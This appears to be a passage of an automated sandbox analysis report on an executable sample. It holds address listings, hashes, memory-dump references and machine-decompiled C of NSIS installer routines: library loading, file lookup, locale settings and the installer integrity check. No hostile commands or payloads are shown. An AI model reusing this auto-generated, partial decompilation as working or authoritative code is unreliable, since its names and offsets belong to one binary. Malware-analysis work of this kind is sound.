                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                            • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                            • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                            • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                            0x00405e90
                                                                                                            0x00405e93
                                                                                                            0x00405e9a
                                                                                                            0x00405ea2
                                                                                                            0x00405eaf
                                                                                                            0x00000000
                                                                                                            0x00405eb6
                                                                                                            0x00405ea5
                                                                                                            0x00405ead
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ebe

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                            • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 310444273-0
                                                                                                            • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                            • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                            • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                            • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                            0x00405e6c
                                                                                                            0x00405e75
                                                                                                            0x00000000
                                                                                                            0x00405e82
                                                                                                            0x00405e78
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,747DF560,0040549F,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 00405E6C
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                            • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                            • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                            • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                            0x004036b5
                                                                                                            0x004036be
                                                                                                            0x004036c5
                                                                                                            0x004036c7
                                                                                                            0x004036db
                                                                                                            0x004036ed
                                                                                                            0x004036f7
                                                                                                            0x004036fc
                                                                                                            0x00403702
                                                                                                            0x00403715
                                                                                                            0x00403715
                                                                                                            0x00403720
                                                                                                            0x004036c9
                                                                                                            0x004036d4
                                                                                                            0x004036d4
                                                                                                            0x00403725
                                                                                                            0x0040372f
                                                                                                            0x00403738
                                                                                                            0x0040373d
                                                                                                            0x0040374e
                                                                                                            0x004037d5
                                                                                                            0x004037dd
                                                                                                            0x004037e6
                                                                                                            0x004037e6
                                                                                                            0x004037fc
                                                                                                            0x00403802
                                                                                                            0x00403810
                                                                                                            0x0040389f
                                                                                                            0x004038a7
                                                                                                            0x004038b1
                                                                                                            0x004038b6
                                                                                                            0x004038bc
                                                                                                            0x00403946
                                                                                                            0x0040394b
                                                                                                            0x0040394d
                                                                                                            0x00403969
                                                                                                            0x00000000
                                                                                                            0x00403969
                                                                                                            0x0040394f
                                                                                                            0x00403955
                                                                                                            0x0040395d
                                                                                                            0x0040395d
                                                                                                            0x00000000
                                                                                                            0x00403955
                                                                                                            0x004038ca
                                                                                                            0x004038db
                                                                                                            0x004038dd
                                                                                                            0x004038df
                                                                                                            0x004038e6
                                                                                                            0x004038e6
                                                                                                            0x004038ee
                                                                                                            0x004038f6
                                                                                                            0x004038f8
                                                                                                            0x004038fa
                                                                                                            0x00403903
                                                                                                            0x00403906
                                                                                                            0x0040390c
                                                                                                            0x0040390c
                                                                                                            0x0040392b
                                                                                                            0x0040393c
                                                                                                            0x00000000
                                                                                                            0x00403941
                                                                                                            0x004038a9
                                                                                                            0x004038ab
                                                                                                            0x00000000
                                                                                                            0x00403816
                                                                                                            0x00403816
                                                                                                            0x0040381c
                                                                                                            0x00403826
                                                                                                            0x0040382e
                                                                                                            0x00403838
                                                                                                            0x0040383e
                                                                                                            0x0040384c
                                                                                                            0x0040396e
                                                                                                            0x0040396e
                                                                                                            0x00000000
                                                                                                            0x0040396e
                                                                                                            0x00403852
                                                                                                            0x0040385b
                                                                                                            0x0040389a
                                                                                                            0x00000000
                                                                                                            0x0040389a
                                                                                                            0x00403754
                                                                                                            0x00403754
                                                                                                            0x00403759
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403763
                                                                                                            0x00403773
                                                                                                            0x00403778
                                                                                                            0x0040377f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403783
                                                                                                            0x00403785
                                                                                                            0x00403792
                                                                                                            0x00403792
                                                                                                            0x0040379a
                                                                                                            0x004037a0
                                                                                                            0x004037c8
                                                                                                            0x004037d0
                                                                                                            0x00000000
                                                                                                            0x004037b2
                                                                                                            0x004037b3
                                                                                                            0x004037bc
                                                                                                            0x004037c2
                                                                                                            0x004037c3
                                                                                                            0x00000000
                                                                                                            0x004037c3
                                                                                                            0x004037be
                                                                                                            0x004037c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004037c0
                                                                                                            0x004037a0

                                                                                                            APIs
                                                                                                              • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                              • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                              • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                            • lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
                                                                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ), ref: 00403795
                                                                                                            • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                                            • GetFileAttributesA.KERNEL32(Call), ref: 004037B3
                                                                                                            • LoadImageA.USER32 ref: 004037FC
                                                                                                              • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                            • RegisterClassA.USER32 ref: 00403843
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                            • CreateWindowExA.USER32 ref: 00403894
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                            • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                            • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                            • GetClassInfoA.USER32 ref: 004038F6
                                                                                                            • GetClassInfoA.USER32 ref: 00403903
                                                                                                            • RegisterClassA.USER32 ref: 0040390C
                                                                                                            • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\Desktop\5t2CmTUhKc.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                            • API String ID: 914957316-1326913468
                                                                                                            • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                            • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                            • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                            • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\5t2CmTUhKc.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\engineer\\Desktop\\5t2CmTUhKc.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\5t2CmTUhKc.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x3fc5b
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x8000
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                                                                            0x00402c80
                                                                                                            0x00402c83
                                                                                                            0x00402c9d
                                                                                                            0x00402ca2
                                                                                                            0x00402cb5
                                                                                                            0x00402cba
                                                                                                            0x00402cc0
                                                                                                            0x00000000
                                                                                                            0x00402cc2
                                                                                                            0x00402cd3
                                                                                                            0x00402ce4
                                                                                                            0x00402ceb
                                                                                                            0x00402cf3
                                                                                                            0x00402cf8
                                                                                                            0x00402cfa
                                                                                                            0x00402dea
                                                                                                            0x00402dec
                                                                                                            0x00402df8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402e01
                                                                                                            0x00402e2d
                                                                                                            0x00402e32
                                                                                                            0x00402e3d
                                                                                                            0x00402e3f
                                                                                                            0x00402e50
                                                                                                            0x00402e6b
                                                                                                            0x00402e74
                                                                                                            0x00402e79
                                                                                                            0x00402e98
                                                                                                            0x00402ea8
                                                                                                            0x00402eba
                                                                                                            0x00402ebf
                                                                                                            0x00402ec7
                                                                                                            0x00402ed4
                                                                                                            0x00402edc
                                                                                                            0x00402ee1
                                                                                                            0x00402ee3
                                                                                                            0x00402ee3
                                                                                                            0x00402eeb
                                                                                                            0x00402eeb
                                                                                                            0x00402eee
                                                                                                            0x00402eef
                                                                                                            0x00402eef
                                                                                                            0x00402ef2
                                                                                                            0x00402ef4
                                                                                                            0x00402ef4
                                                                                                            0x00402ef7
                                                                                                            0x00402efe
                                                                                                            0x00402f0a
                                                                                                            0x00000000
                                                                                                            0x00402f0f
                                                                                                            0x00000000
                                                                                                            0x00402ec7
                                                                                                            0x00000000
                                                                                                            0x00402e7b
                                                                                                            0x00402e09
                                                                                                            0x00402e1b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d00
                                                                                                            0x00402d00
                                                                                                            0x00402d05
                                                                                                            0x00402d09
                                                                                                            0x00402d10
                                                                                                            0x00402d17
                                                                                                            0x00402d19
                                                                                                            0x00402d19
                                                                                                            0x00402d21
                                                                                                            0x00402d28
                                                                                                            0x00402e87
                                                                                                            0x00402ec9
                                                                                                            0x00000000
                                                                                                            0x00402ec9
                                                                                                            0x00402d34
                                                                                                            0x00402db8
                                                                                                            0x00402dbb
                                                                                                            0x00402dc0
                                                                                                            0x00000000
                                                                                                            0x00402db8
                                                                                                            0x00402d41
                                                                                                            0x00402d46
                                                                                                            0x00402d4e
                                                                                                            0x00402d74
                                                                                                            0x00402d7a
                                                                                                            0x00402d83
                                                                                                            0x00402d89
                                                                                                            0x00402d8e
                                                                                                            0x00402d94
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d9e
                                                                                                            0x00402da6
                                                                                                            0x00402da9
                                                                                                            0x00402dae
                                                                                                            0x00402db0
                                                                                                            0x00402db0
